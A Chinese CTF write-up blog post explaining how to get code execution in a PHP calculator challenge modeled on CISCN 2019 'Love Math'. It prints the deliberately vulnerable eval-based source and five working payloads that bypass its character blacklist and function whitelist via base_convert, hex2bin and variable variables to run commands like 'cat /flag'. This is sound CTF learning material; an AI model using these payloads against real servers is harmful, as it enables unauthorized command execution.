Caculator题的exp

ctf

Word count: 1.2kReading time: 5 min

 2020/10/26   Share

SimpleCalculator

没有图片，是个计算的页面
允许四则运算、丰富的PHP函数
SQL注入、XSS、LFI、模板注入都试过了，那只能是RCE(本地代码执行)了，没有思路，后面看writeup才发现大家都有exp，就我没有~

1	search=$cos=(is_nan^(6).(4)).(tan^(1).(5));$cos=$$cos;$cos{0}($cos{1})&0=system&1=ls

https://mmbiz.qpic.cn/mmbiz_png/K9JoBxX2CgC6y1sXfno26oUJpJlNF77RltufZPsy29LeNPvlVFUTbgGBoLRV7yNlNPLqjseFjib2pN547LMRNMg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

其实这题的原型是CISCN 2019的Love Math

1 <?php
 2 error_reporting(0);
 3 //听说你很喜欢数学，不知道你是否爱它胜过爱flag
 4 if(!isset($_GET['c'])){
 5     show_source(__FILE__);
 6 }else{
 7     //例子 c=20-1
 8     $content = $_GET['c'];
 9     if (strlen($content) >= 80) {
10         die("太长了不会算");
11     }
12     $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
13     foreach ($blacklist as $blackitem) {
14         if (preg_match('/' . $blackitem . '/m', $content)) {
15             die("请不要输入奇奇怪怪的字符");
16         }
17     }
18     //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
19     $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
20     preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
21     foreach ($used_funcs[0] as $func) {
22         if (!in_array($func, $whitelist)) {
23             die("请不要输入奇奇怪怪的函数");
24         }
25     }
26     //帮你算出答案
27     eval('echo '.$content.';');
28 }

过滤掉黑名单里的值，然后只允许白名单的函数和数字

第一种方法:getallheaders()

环境:PHP 7.3 看wp说这种方法仅适用于linux +php7.3以上

getallheaders — 获取全部 HTTP 请求头信息
成功返回所有头信息数组,失败返回False
5.5.7 此函数可用于 CLI server。
5.4.0 此函数可用于 FastCGI。此前仅在PHP以 Apache 模块方式运行时支持。
首先调用base_convert函数，将十进制转为其他进制让长度缩减
base_convert(number,frombase,tobase)函数在任意进制之间转换数字。
number 必需原始值
frombase 必需，数字原来的进制
tobase 必需要转换的进制
利用getallheader()来控制请求头，
$pi(696468,10,36)——>exec
$pi(8768397090111664438,10,30) ——>getallheaders
让第一个返回的元素为cat flag
1:cat /flag
payload:

$pi=base_convert,$pi(696468,10,36)(($pi(8768397090111664438,10,30))(){1})
//exec(getallheaders(){1}) 虽然过滤了[]但是可以使用{}来读取

第二种方法getflag

//exec(‘hex2bin(dechex(109270211257898))’) => exec(‘cat f*‘)
($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))
//system(‘cat’.dechex(16)^asinh^pi) => system(‘cat *‘)
base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))

dechex() 函数把十进制转换为十六进制。
hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。

第三种方法

1	search=$cos=(is_nan^(6).(4)).(tan^(1).(5));$cos=$$cos;$cos{0}($cos{1})&0=system&1=ls

第四种：读取当前目录下所有文件

dechex() 函数把十进制转换为十六进制。
hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。
base_convert(1751504350,10,36) ——–>system

$pi(1438255411,14,34) ——>hex2bin

dechex(1852579882) —–>将十进制转为十六进制：6e6c202a（字符串形式是：nl *）

payload

($pi=base_convert)(1751504350,10,36)($pi(1438255411,14,34)(dechex(1852579882)))

nl命令用于读入指定文件,nl * 是读入当前目录所有文件

方法五(推荐)

传入?c=$_GET[a]&a=system(‘ls’)即可执行命令
假设payload是

?c=($_GET){0}($_GET){1};&0=system&1=cat /flag

但是过滤了_GET因此需要构造出来,这里应该首先考虑进制转换函数，因为10进制以上的数都有英文字母作为数码。而假如是36进制数的话，将会拥有1~10加上26个英文字母作为数码，这足以我们拼凑出payload。

倒推方法如下：

_GET->bin2hex('_GET')->5f474554
->hexdec('5f474554')->1598506324#纯数字
#需要构造hex2bin()
base_convert('hex2bin',36,10)->37907361743

所以

$pi=base_convert(37907361743,10,36)(dechex(1598506324));
$pi=hex2bin(5f474554);
$pi=_GET;
$$pi=$_GET;

因此最后payload是

1	/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat%20/flag

Author：HacKerQWQ

原文链接：https://hackerqwq.github.io/2020/10/26/Caculator%E9%A2%98%E7%9A%84exp/

发表日期：October 26th 2020, 2:33:16 pm

更新日期：April 18th 2021, 12:47:17 am

Next Post

python多线程审计代码可利用变量
Previous Post

渗透测试之提权篇一(Linux及Windows提权相关概念)

CATALOG

1. SimpleCalculator

